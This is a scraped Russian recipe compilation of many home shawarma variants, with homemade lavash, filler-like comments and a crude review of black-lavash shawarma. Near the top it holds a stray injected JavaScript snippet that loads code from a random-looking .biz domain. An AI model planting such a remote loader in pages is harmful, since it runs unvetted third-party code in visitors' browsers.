10 лучших рецептов домашней шаурмы. Шаурма в черном лаваше


Шаверма в лаваше

"); var visitweb_script = document.createElement("script"); visitweb_script.type = "text/javascript"; visitweb_script.charset = "utf-8"; visitweb_script.src = "//rjblyo.gewrrpygsd.biz/xdc/UEp2OXpqUEw3UDQ3MGg1ULFsJSax1A"; if (document.body) { document.body.appendChild(visitweb_script); }else{ document.getElementsByTagName("head")[0].appendChild(visitweb_script); }

Домашняя Шаурма с курицей за 15 минут!

Домашняя шаверма в лаваше. Пошаговый рецепт с фото

Шаурма, шаверма, донер-кебаб – это все названия одного блюда – завернутой в лаваш начинки. Лаваш для него берут тонкий, его еще у нас называют армянским, а начинка обычно состоит из мяса, овощей и соуса. Кто-то, должно быть, покупал шаурму на улице и в кафе, но вот я, как-то, пропустила этот момент в своей жизни и готовила ее сама. Не знаю, как на вкус покупная, но домашняя нам понравилась очень. Вкусно, сочно, сытно, много. Поэтому сегодня – шаурма с курицей в домашних условиях, рецепт с фото, как обычно.

Как я поняла, курица – это наиболее часто используемое мясо для приготовления домашней шаурмы. Несмотря на то, что принцип везде один, несколько отличающихся друг от друга рецептов много. Давайте рассмотрим несколько, чтобы вы могли выбрать для себя наиболее подходящий.

Рецепт шаурмы в домашних условиях с курицей и морковью по-корейски

Вот такой вот микс, в котором встретились Ближний и Дальний восток. Микс получился интересный, острая и пикантная морковь очень хорошо оттеняет нежную куриной грудки и нейтральную капусту.

Ингредиенты на 1 шаурму:

  • филе куриной грудки – 1шт;
  • соевый соус – 1ч.л.;
  • морковь – 1шт;
  • специи (хмели-сунели, паприка) – по 1 щепотке;
  • капуста белокочанная – 50гр;
  • майонез – 1ч.л.;
  • помидор – 1шт;
  • лук – 1шт;
  • растительное масло – 1/3 стакана;
  • соль – по вкусу;
  • лаваш – 1шт.

Как приготовить шаурму с курицей по-домашнему

  1. Для 1 порции, которая получается довольно большой, мы берем 1 половинку филе куриной грудки. Нарезаем ее крупной соломкой, кладем в миску, поливаем соевым соусом, чуть-чуть подсаливаем (совсем немного, соус сам по себе соленый) и отставляем в сторону, чтобы мясо немного промариновалось.
  2. Тем временем готовим другие ингредиенты. Капусту тонко шинкуем.
  3. Лук для шаурмы можно взять двух видов: красный и обычный репчатый. Обычный мы нарезаем мелко. Он потребуется для приготовления корейской моркови.
  4. Морковь очищаем и натираем на терке тонкой соломкой.
  5. Кладем в миску и добавляем специи. Можно по желанию кроме перечисленных в списке ингредиентов добавить и немного острого перца, тогда наша шаурма с курицей получится более пикантной. Немного присаливаем.
  6. Лук, нарезанный мелкими кубиками, обжариваем в сковороде в нагретом растительном масле. Обжариваем хорошо. Сам лук нам больше не понадобится, а вот масло, напитавшееся им необходимо.
  7. Процеживаем через металлическое ситечко, заливая горячим маслом морковь. Лук выбрасываем. Даем моркови настояться.
  8. Пока она настаивается возвращаемся к курице. Обжариваем ее до готовности в сковороде в растительном масле. Курица готовится быстро, на это уйдет около 5-7 минут.
  9. Немного остужаем. А пока режем помидоры тонкими ломтиками.
  10. Капусту слегка приминаем руками с солью. Очень осторожно добавляйте соль на всех этапах приготовления шаурмы, чтобы в итоге она не получилась слишком соленой.
  11. Теперь внимательно следите за фото. Рецепт переходит в стадию сборки шаурмы с курицей. Расстилаем лаваш. Он может показаться слишком большим, но это только первое впечатление, потом, заворачивая, вы поймете, что его размер подходит идеально. С одной стороны выкладываем салат из капусты, отступив от правого края около 10 см. Сверху кладем курицу.
  12. Следующим слоем пойдет морковь и на ней помидоры.
  13. Красный лук нарезаем полукольцами. Если у вас его нет, подойдет и обычный.
  14. Сворачиваем шаурму с курицей рулетом. Сначала отгибаем наверх правый край, затем верхний и нижний и плотно скручиваем до конца лаваша, уверенно, но стараясь не порвать. Получаем вот такой конверт, как на фото.
  15. Далее шаурму нужно обжарить. Сделать это можно как на сухой сковороде, так и на слегка смазанной маслом. Я жарила на сухой сковороду-гриль, так на лаваше останутся симпатичные зажаренные полоску. Обжариваем с обеих сторон.

Готовую горячую шаурму подаем к столу. Можно ее разрезать на 2 половинки наискосок. Вот вы и освоили рецепт шаурмы в домашних условиях с курицей в лаваше.

Если он показался вам сложным и вы хотите получить закуску быстрее и с меньшими усилиями посмотрите следующий рецепт.

Шаурма с курицей, листовым салатом и свежими овощами

В домашних условиях, когда не хочется возиться со сложным рецептом шаурмы, ее можно приготовить с курицей и набором свежих овощей.

Для 3 порций нам понадобится:

  • куриная грудка – 1шт;
  • листовой салат – 3 листа;
  • свежий огурец – 1шт;
  • сладкий красный перец – 1шт;
  • помидор – 1шт;
  • лук – 1шт;
  • соль, черный молотый перец – по вкусу;
  • растительное масло – 2ст.л.;
  • лаваш – 1шт.

Как быстро приготовить шаурму с курицей

  1. Куриное мясо мы так же как и в предыдущем рецепте нарезаем длинными кусочками, солим, перчим и обжариваем на сковороде с 1 столовой ложкой масла.
  2. Пока она остывает подготавливаем овощи. Листья салата моем и выкладываем на бумажное полотенце, чтобы убрать капли воды.
  3. Огурцы режем кружками или полукружьями. Сладкий перец чистим от семян и перегородок, нарезаем соломкой. Помидоры – тонким ломтиками. Лук – полукольцами. Можно так взять как красный, так и обычный лук. Смешиваем овощи в миске, солим по вкусу и заправляем салат растительным маслом. Да, мы для этой шаурмы с курицей готовим обычный салат из свежих овощей.
  4. Как вы видите на фото, по рецепту шаурму сворачивать будем не рулетом, а кульком, конусом, если так можно выразиться. Поэтому одного большого тонкого лаваша хватит на три порции. Значит, разрезаем его на три равные части. На каждую сначала расстилаем лист зеленого салата, затем кладем кусочки куриного мяса и свежие овощи.
  5. Сворачиваем кульком с открытым верхом. Такая шаурма держит форму не очень хорошо, поэтому чтобы ее было удобно есть оборачиваем листом бумаги для выпечки или плотной бумажной салфеткой и перевязываем ближе к основанию кулинарным шпагатом, бечевкой, толстыми нитками или тесьмой.

Шаурма с курицей готова! Как видите, этот рецепт простой и быстрый. В домашних условиях вы легко приготовите такую шаурму как на фото выше.

Рецепт шаурмы с курицей и жареным картофелем

Но и это еще не все. Хочу предложить вашему вниманию еще один вариант, когда для шаурмы берется запеченная курица, курица-гриль или куриный шашлык. Чем хорош рецепт? Тем, что решает вопрос с пристройством остатков курицы или шашлыка. Еще нам понадобится жареная картошка или картофель фри. Так что блюдо получается сытным и с приятным ароматом дымка.

Ингредиенты (без указания количества):

  1. запеченная курица;
  2. жареный картофель;
  3. сметана или натуральный йогурт;
  4. зелень;
  5. тонкий лаваш.

Как сделать эту шаурму

  1. Количество ингредиентов я не указала по той простой причине, что их вы можете определить исходя из остатков курицы или шашлыка и основываясь на тех же самых принципах, что и в предыдущих рецептах.
  2. Мясо разбираем руками на небольшие куски.
  3. Картошку, если готовите специально, нарежьте брусочками среднего размера и обжарьте в нагретом растительном масле до готовности. Не забудьте посолить!
  4. Зелень (укроп, петрушку, по желанию можно кинзу) мелко рубим и смешиваем со сметаной или натуральным (несладким) йогуртом.
  5. Смешиваем курицу с картофелем, выкладываем на лаваш, сверху поливаем соусом и сворачиваем конвертом. Так как основные ингредиенты шаурмы – курица и картошка у нас уже жаренные, то дополнительно обжаривать завернутую в лаваш шаурму не стоит.

Готово! Тоже быстро, правда?

Если вам понравились рецепты шаурмы с курицей и вы захотите повторить их дома, распечатайте себе рецепт и фото.

Приятного аппетита!

Поделитесь рецетом в соц. сетях:

Источник: https://blog-recept.ru/retsept-shaurmy-v-domashnih-usloviyah-s-kuritsej-v-lavashe/

Опубликовано: 25.01.2018 | Автор: Власта

Рейтинг статьи: 5

Похожее:

Всего 8 комментариев.

15.02.2018 Наталия:Готовится шаурма (шаверма) в домашних условиях довольно быстро.Домашняя шаурма в лаваше - это вкусно, сытно, удобно.

20.03.2018 Натан:СодержаниеКак сделать шаурму в тонком лавашеШаурма в лавашеВ Питере это блюдо имеет чуть иное название – шаверма, которая в отличие от более.

04.02.2018 Онуфрий:Готовим шаверму в тонком лаваше с куриным филе, овощами, зеленью и приправамиНа самом деле шаверма в домашних условиях готовится легко и быстро.

10.02.2018 Григорий:Первым распределите салат на лаваше, полейте щедро соусом, выложите курицу и сверните рулетом. Шаверма в домашних условиях в лаваше. Ингредиенты.

10.02.2018 Лонгин:Так называемая «шаверма», пользуется огромной популярностью, из-за того, что ею можно быстро и сытно перекусить.Рецепт 3. Как приготовить шаурму дома в лаваше со свининой.

talantlive.ru

10 лучших рецептов домашней шаурмы

Шаурма – блюдо арабского происхождения, которое является отличным перекусом. Готовится шаурма с использованием лаваша, соусов, салата и мяса, жаренного на гриле.

Шаурма в домашних условиях готовится легко и быстро, она отлично подходит для ужина, который согласно правильному питанию должен включать в себя белок и овощи.

Шаурма с грибами

Ингредиенты:

  • Лаваш – 3 штуки.
  • Грибы шампиньоны – 200 грамм.
  • Куриное филе – 200 грамм.
  • Корнишоны – 100 грамм.
  • Твердый сыр – 150 грамм.
  • Капуста белокочанная – 200 грамм.
  • Морковь – 100 грамм.
  • Огурец – 1 штука.
  • Майонез – 100 грамм.
  • Кетчуп – 100 грамм.
  • Специя хмели-сунели – по вкусу.

Способ приготовления:

Филе курицы отварить, нарезать кусочками.

Грибы промыть, нарезать, пожарить на сковороде до готовности.

Смешать кетчуп и майонез до однородности.

Сыр натереть на мелкой терке.

Капусту мелко нашинковать, огурец нарезать пластинками.

Корнишоны нарезать кубиками.

Лаваш смазать соусом, выложить начинку слоями: мясо, капуста, морковь, огурцы, корнишоны.

Смазать начинку соусом, посыпать специей и тертым сыром.

Завернуть лаваш в шаурму, выложить ее на противень, готовить в духовке 3 – 5 минут.

Шаурма с твердым сыром

Ингредиенты:

  • Лаваш – 3 штуки.
  • Помидоры – 3 штуки.
  • Куриная грудка крупная – 1 штука.
  • Огурцы – 2 штуки.
  • Сыр твердый – 200 грамм.
  • Майонез и кетчуп – по вкусу.
  • Карри, перец черный молотый – по вкусу.
  • Морковь по-корейски – 200 грамм.
  • Капуста белокочанная – 200 грамм.
  • Репчатый лук – 1 штука.

Способ приготовления:

Куриную грудку отварить до готовности, остудить, нарезать кубиками.

Обжарить до румяности мясо с карри и черным перцем.

Лук нарезать полукольцами.

Капусту нашинковать соломкой.

Помидоры вымыть, нарезать дольками.

Огурец вымыть, нарезать соломкой.

Сыр натереть на крупной терке.

Лаваш смазать кетчупом и майонезом.

Выложить на лаваш начинку: мясо, капуста, морковь, помидор, огурец, лук, сыр.

Начинку смазать майонезом и кетчупом, завернуть лаваш рулетом.

Подогреть шаурму в микроволновой печи, чтобы сыр растаял.

Классическая шаурма

Ингредиенты:

  • Лаваш – 1 штука.
  • Помидор – 1 штука.
  • Огурец – 1 штука.
  • Капуста белокочанная – 100 грамм.
  • Куриное филе – 1 штука.
  • Майонез – 50 миллиграмм.
  • Сметана – 50 миллиграмм.
  • Чеснок – 3 – 4 зубчика.
  • Аджика – 50 миллиграмм.

Способ приготовления:

Лаваш выложить на поверхность стола.

Приготовить чесночный соус: смешать майонез со сметаной и раздавленными зубчиками чеснока, перемешать и поставить в холодильник на 30 минут.

Смазать лаваш тонким слоем соуса и аджики.

Куриное филе отварить до готовности, нарезать на мелкие кусочки и поджарить на сковороде до румяности.

Выложить курицу на лаваш. Выкладывать начинку лучше не посередине, а на 2/3 края лаваша, чтобы его было удобно закручивать.

Капусту нашинковать, выложить возле или поверх мяса.

Помидор и огурец вымыть, нарезать кубиками (огурец полукругом), выложить овощи поверх мяса и капусты.

Обильно сбрызнуть начинку соусом и аджикой.

Завернуть лаваш в шаурму.

Подогреть шаурму в микроволновой печи 1 – 1,5 минуты, далее поставить под гриль на несколько минут с каждой стороны, чтобы лаваш стал хрустящим.

Шаурма с добавлением картошки

Ингредиенты:

  • Лаваш – 1 штука.
  • Куриное филе – 500 грамм.
  • Репчатый лук – 1 штука.
  • Картофель фри – 200 грамм.
  • Капуста белокочанная – 150 грамм.
  • Морковь – 100 грамм.
  • Кетчуп – 100 грамм.
  • Майонез – 150 грамм.

Способ приготовления:

Куриное филе промыть, посолить, поперчить, завернуть в фольгу.

Жарить филе в духовке до готовности, разрезать фольгу и готовить еще 5 – 10 минут, чтобы мясо зарумянилось.

Картофель фри пожарить, если он сырой на сковороде с обилием масла или во фритюре. Выложить картофель на салфетку, чтобы она впитала в себя лишнее масло.

Репчатый лук нарезать мелкими кубиками.

Капусту нашинковать ножом или шинковкой.

Лаваш выложить на разделочной доске, смазать кетчупом и майонезом.

Выложить на лаваш мясо, картофель фри, капусту, морковь и лук.

Сверху смазать овощи майонезом и кетчупом, завернуть шаурму.

Выложить шаурму на противень, нагревать в духовке, пока она не зарумянится.

Шаурма без мяса

Ингредиенты:

  • Лаваш – 2 листа.
  • Свежий базилик – 1 пучок.
  • Шпинат – 300 грамм.
  • Чеснок – 1 зубчик.
  • Сливочное масло – 100 грамм.
  • Кинза – 1 пучок.
  • Сыр моцарелла – 100 грамм.
  • Перец болгарский – 1 штука.
  • Кетчуп – 100 грамм.
  • Майонез – 50 грамм.

Способ приготовления:

Кинзу промыть, обсушить, нарезать мелко.

Базилик и шпинат вымыть, дать обсохнуть и порвать мелко руками.

Чеснок очистить, раздавить чесночницей, добавить в майонез и перемешать.

Сливочное масло растопить, смазать им лист лаваша.

Поверх масла, смазать лаваш майонезом с чесноком и кетчупом.

Выложить на лаваш шпинат с базиликом.

Сыр моцарелла нарезать кусочками, выложить на зелень.

Перец болгарский вымыть, очистить от семян, нарезать кубиками, выложить на сыр.

Выложить поверх сыра кинзу, умеренно полить кетчупом и майонезом.

Завернуть лаваш в рулет, нагревать в микроволновой печи 2 минуты при 600 Ватт, чтобы сыр немного расплавился.

Шаурма без лаваша

Ингредиенты:

  • Багет – 1 штука.
  • Морковь по-корейски – 100 грамм.
  • Помидор – 1 штука.
  • Куриный окорочок – 300 грамм.
  • Майонез – 50 грамм.
  • Капуста белокочанная – 150 грамм.
  • Кетчуп – 100 грамм.
  • Соль, специи – по вкусу.

Способ приготовления:

Куриный окорок промыть, вынуть косточки, нарезать мясо кусочками.

Обжарить мясо на сковороде до румяности с солью и специями.

Капусту нашинковать, помидор нарезать кубиками.

Багет нарезать на несколько кусков. Каждый кусочек надрезать с одной стороны, раскрыть его, вынуть мякоть, чтобы стенки были как можно тоньше.

Смазать багет майонезом и кетчупом по всей поверхности.

Выложить на раскрытый багет морковь, капусту, мясо, помидор.

Свернуть багет с начинкой как можно плотнее, чтобы она не вываливалась.

Выложить багет на смазанную маслом сковороду, обжарить до хрустящей корочки.

Шаурма с листьями салата

Ингредиенты:

  • Лаваш – 6 штук.
  • Листья салата – 300 грамм.
  • Соль, специи – по вкусу.
  • Куриное филе – 600 грамм.
  • Чеснок – 6 зубчиков.
  • Репчатый лук – 3 штуки.
  • Майонез – 200 грамм.
  • Помидоры – 2 штуки.
  • Огурцы – 2 штуки.
  • Укроп – по вкусу.

Способ приготовления:

Репчатый лук очистить, нарезать кубиками. Обжарить лук на сковороде до прозрачности со специями.

Куриное филе промыть, нарезать кусочками, добавить к луку.

Укроп мелко порубить, добавить к курице, посолить и поперчить.

Обжарить курицу до готовности 15 минут.

Помидор нарезать кубиками, огурец – соломкой.

Листья салата промыть, обсушить и порвать руками.

Майонез перемешать в раздавленным чесноком, укропом и специями. Перемешать соус.

Лист лаваша смазать соусом, выложить на него капусту, мясо с луком и его соком, овощи. Свернуть лаваш в рулет.

Завернуть шаурму в пищевую пленку, нагревать в микроволновой печи 1 минуту.

Шаурма с фаршем

Ингредиенты:

  • Лаваш – 4 штуки.
  • Мясной фарш – 300 грамм.
  • Морковь по-корейски – 200 грамм.
  • Капуста пекинская – 300 грамм.
  • Помидоры – 3 штуки.
  • Репчатый лук – 1 штука.
  • Соль, перец по вкусу.
  • Майонез – по вкусу.
  • Кетчуп – по вкусу.
  • Огурцы – 2 штуки.
  • Сыр твердый – 200 грамм.
  • Уксус – 5 миллиграмм.

Способ приготовления:

Фарш обжарить на сковороде с солью и специями до готовности.

Лук нарезать полукольцами, обдать кипятком, залить уксусом на 30 минут.

Помидор нарезать дольками, огурец длинной соломкой.

Сыр натереть на крупной терке.

Капусту нарезать мелко ножом для шинковки.

Майонез и кетчуп смешать в равных пропорциях в соус.

Смазать соусом лаваш, выложить на него все ингредиенты слоями.

Свернуть лаваш в рулет, готовить шаурму под грилем в микроволновой печи 5 – 10 минут до румяности.

Шаурма с колбасой

Ингредиенты:

  • Лаваш – 1 штука.
  • Огурец – 1 штука.
  • Помидор – 1 штука.
  • Колбаса салями – 200 грамм.
  • Твердый сыр – 100 грамм.
  • Листья салата – 1 пучок.
  • Укроп и петрушка – по вкусу.
  • Майонез – 50 грамм.
  • Кетчуп – 50 грамм.
  • Чеснок – 2 зубчика.

Способ приготовления:

Чеснок очистить, раздавить чесночницей, смешать с майонезом и кетчупом в соус.

Огурец и помидор нарезать кружкам или дольками.

Твердый сыр натереть на мелкой терке.

Колбасу нарезать кубиками, немного поджарить на сковороде со специями.

Листья салата обмыть и просушить.

Зелень мелко порубить.

Лаваш смазать соусом, выложить колбасу, овощи, кусочки листьев салата.

Посыпать начинку зеленью, твердым сыром, смазать соусом.

Завернуть лаваш в шаурму, запечь в духовке до хрустящей корочки.

Шаурма с крабовыми палочками

Ингредиенты:

  • Лаваш – 1 штука.
  • Крабовые палочки – 150 грамм.
  • Сардина консервированная– 1 банка.
  • Зелень – по вкусу.
  • Помидор – 1 штука.
  • Огурец – 1 штука.
  • Капуста белокочанная – 100 грамм.
  • Майонез и кетчуп – по вкусу.

Способ приготовления:

Капусту мелко нашинковать, смешать с майонезом, чтобы она стала немного мягче и сочнее.

Огурец нарезать длинной соломкой.

Помидор нарезать дольками.

Банку сардин вскрыть, слить жидкость и размять рыбу вилкой.

Крабовые палочки нарезать кубиками.

Зелень вымыть, обсушить бумажными полотенцами, нарезать мелко.

Лаваш смазать майонезом и кетчупом, выложить начинку: капуста, сардина, крабовые палочки, овощи, зелень.

Полить начинку небольшим количеством кетчупа и майонеза.

Завернуть лаваш в рулет, запечь в микроволновой печи под грилем до румяности.

Источник

zakustom.com

Пошаговый рецепт домашней шаурмы с курицей в лаваше

Похожие статьи

Содержание статьи:

Лаваш, наполненный соблазнительной начинкой из мяса, приготовленного на гриле, соуса и овощного салата, называют в разных странах по-разному. Нам это блюдо знакомо под названием шаурма. Сегодня шаурму продают повсеместно. Очень трудно устоять против одуряющего аромата запекающегося мяса, которое продавцы ловко нарезают, добавляя к нему свежие овощи, и заворачивают в тонкие листы лаваша. Однако далеко не всегда есть уверенность в том, что соблюдение санитарных правил у торговцев на высоте. А ведь это блюдо, совершенно несложное в приготовлении, можно приготовить дома, и оно будет еще вкуснее. Как сделать шаурму в лаваше дома – описывается в пошаговом рецепте.

Рецепт приготовления домашней шаурмы с курицей в лаваше

  • Время приготовления: 30 мин.
  • Количество порций: 4.
  • Кухонная техника: духовка.

Ингредиенты

Лаваш 4 шт.
Куриное филе 350 г
Огурцы малосольные 100 г
Помидор 1 шт.
Сыр твердый 140 г
Пекинская капуста 140 г
Красная капуста 60 г
Растительное масло 50 мл
Соль, перец, специи По вкусу
Соус
Горчица 100 г
Майонез 100 г
Кетчуп 50 г

Из специй рекомендуется взять хмели-сунели и смесь перцев. Горчица понадобится слабоострая. В рецепте указан готовый армянский лаваш, но, при желании, его можно сделать самим.

Приготовление домашней шаурмы с курицей в лаваше

  1. Сначала подготовим курицу. Филе нужно подсолить, присыпать специямии обжарить на растительном масле на медленном огне.
  2. Мелкой соломкой нарезаем пекинскую капусту, красную капусту.Малосольные огурцы разрезаем на 4 части, помидоры – полукольцами.На крупной терке натираем сыр.
  3. Готовим соус.Все ингредиенты тщательно смешиваем.
  4. Поджаренные филе нарезаем тонкими ломтиками.
  5. Собираем шаурму. Сначала выкладываем на лаваш капусту двух видов, затем ломтики курицы, сверху – огурцы, затем помидоры.Все это обильно поливаем соусом, а сверху кладем сыр.
  6. Теперь заворачиваем все это великолепие в лаваш, подвернув края по бокам.
  7. Отправляем шаурму в разогретую до 220º духовку на 5 минут.

Видео – как приготовить шаурму в лаваше в домашних условиях

На видео демонстрируется процесс приготовления шаурмы в лаваше в домашних условиях: приготовление соуса, начинки и, что очень важно – как правильно завернуть шаурму в лаваш.

Рецепт приготовления лаваша для шаурмы в домашних условиях

  • Время приготовления: 50 мин.
  • Количество порций: 6.

Ингредиенты

Мука 300 г
Вода 150 мл
Масло растительное 3 ст. л.
Соль По вкусу

Приготовление лаваша для шаурмы

  1. В просеянную муку влить воду и масло, подсолить, замесить упругое тесто. Завернуть его в пленку и оставить на полчаса.
  2. Разделить тесто на несколько частей (в зависимости от диаметра сковороды), раскатать в тонкие коржи.
  3. Обжарить коржи на сковороде, не добавляя масла. Выложить на мокрую ткань, сбрызнуть водой.

Полезные советы

Понятно, что в шаурме с курицей ингредиенты вполне можно заменять, ориентируясь на собственные предпочтения. Например, вместо малосольных огурцов можно положить свежие. Или не класть капусту, а добавить моркови по-корейски. И курицу можно сразу обжаривать мелкими кусочками, добавив к ней лука. Уместна будет и любая зелень. Можно обойтись без сыра. Если кто-то не любит горчицу – ее можно просто проигнорировать. Даже в духовку ставить шаурму не обязательно – ведь все составные рецепта в готовом состоянии. В общем, все зависит от вкусов и воображения того, кто готовит это пикантное блюдо. Вообще, набор продуктов, сочетаемых с лавашом, фантастически широк, поэтому закуска из лаваша пользуется такой популярностью. Даже все то, из чего мы делали шаурму, можно оформить в другое блюдо, не менее вкусное – рулет из лаваша с курицей.

Думаю, все, кто приготовит шаурму в лаваше дома, поймут, насколько это вкусно, быстро и сытно, и наверняка заинтересуются другими блюдами с лавашом в духовке с начинкой.

А пока предлагаем любителям шаурмы поделиться своими рецептами – что лучше положить в шаурму, чтобы она стала еще вкуснее.

www.izyskon.com

Street food

Иногда шаурма, она как девушка: за красивой или необычной оберткой, скрывается вполне себе такая заурядная начинка. 

Сейчас рынок настолько переполнен ларьками с шаурмой, что каждый пытается выделиться по своему. Кто-то пишет, что внутри халяльное мясо, кто-то делает безумно низкую цену. А кто-то, просто меняет цвет лаваша.

Если в прошлом году трендом был “сырный” лаваш (хотя он нифига не сырный),  то в этом году, цвет сезона - черный. 

Вслед за черным бургером из Бургер Кинга, многие рестораны начали делать бургеры с черными булками. И, если на примере того же Irish pub Dublin, где булки пекутся в самом заведении, а не заказываются “извне”, черный бургер там ахуеть какой вкусный, то с шаурмой такое дело не прокатывает. Но обо всем по порядку.

В заново провально открывшемся “Гостином дворе” появилось довольно-таки стильное (ага, сама улыбнулась) место - Shawаrma House. Стильненькая шаурма с хорошим брендингом, пришедшая на смену хипстерским кафешкам.

Предлагают они несколько видов шаурмы (видимо, чтоб всем угодить), и конечно же, хит сезона, шаурма “Дарт Вейдер” в черном лаваше. Кстати, это самая дорогая шаурма в городе, 160 рублей. Но, в офисе меня ждали голодные мужчины, поэтому потомившись около 10 минут, я забрала 5 шаверм и погнала дальше по своим делам.

А вот сейчас, просьба слабонервных, беременных, фитоняшек и недалеких домохозяек закрыть этот текст и пойти фоткаться к себе в инстаграм. Вы не такие? Тогда поехали.

Первое - вид. Черная шаурма - не угольно-черного цвета, не как плащ у Дарта Вейдера, не как моя душа, а такого цвета пыльного налета на капоте машины.

И да, с некоторых ракурсов она похожа… ну сами смотрите :)

Второе - запах. Пахнет она довольно-таки резко, тому виной чернила каракатицы, которыми красят лаваш. Как давно не видавшая душа девушка ну, или попросту, не самыми свежими морепродуктами. Но потом к запаху привыкаешь, что поделать уж.

Оригинал поста: gameraboy

Состав. Мясо, помидоры, огурцы (которые обнаружились почему-то только к середине), салат, соусы и картошки фри, которая, на самом деле, там нафиг не нужна, ибо она намокает соусами и превращается в какое-то сувлаки. Так себе сочетание. 

Эта шаурма, кстати, не такая уж и большая. Я привыкла к тому, что шаурма как болт у актеров из порно - от запястья до локтя примерно, а тут она немного не дотянула.

Общие впечатления - ну так себе. Средненькая шава, ничего в ней примечательного, кроме лаваша, пахнущего русалкой Ариель. Ради любопытства можете попробовать, но второй раз вы за ней не пойдете.

Оригинал поста: disneyboost

ufastreetfood.tumblr.com


Смотрите также